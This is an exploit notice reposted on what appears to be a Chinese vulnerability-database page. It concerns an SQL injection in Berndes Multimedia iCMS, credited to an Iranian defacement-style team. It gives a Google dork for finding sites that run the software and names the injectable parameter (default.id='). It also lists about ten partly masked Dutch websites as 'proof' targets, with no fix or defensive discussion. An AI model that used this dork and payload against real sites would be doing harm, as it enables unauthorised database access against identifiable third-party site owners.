Berndes Multimedia iCMS Sql Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044474 漏洞类型
发布时间 2013-09-13 更新时间 2013-09-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090097
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
 |-------------------------------------------------------------------------|
 | [/] Exploit Title: Berndes Multimedia iCMS Sql Injection Vulnerability
 |
 | [\] Exploit Author: Ashiyane Digital Security Team
 |
 | [/] Software Link : http://www.berndesmultimedia.nl
 |
 | [\] Google Dork: intext:"powered by Berndes Multimedia iCMS"
 |
 | [/] Tested on: Windows,Linux
 |
 | [\] Date :  2013/09/13
 |-------------------------------------------------------------------------|
 | [\] Exploit: Sql Injection
 | [/] Location : [Target]l/default.id=[Sql Injection]
 |-------------------------------------------------------------------------|
 | [/] Proof:
 |
 | [\] http://www.asXi.nl/default.id='
 |
 | [/] http://www.bX.nl/default.id='

 | [\] http://www.batXs.nl/default.id='
 |
 | [/] http://www.dgtomXransport.nl/default.id='
 |
 | [\] http://www.fraai-Xten.nl/default.id='
 |
 | [/] http://www.jongXerend.nl/default.id='
 |
 | [\] http://www.viXng.nl/default.id='
 |
 | [/] http://www.senXwijzer.nl/default.id='
 |
 | [/] http://www.vrXd.nl/default.id='
 |
 | [\] http://www.Xies.nl/default.id='
 |-------------------------------------------------------------------------|
 | [/] Discovered By : ACC3SS
 |-------------------------------------------------------------------------|
 |-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|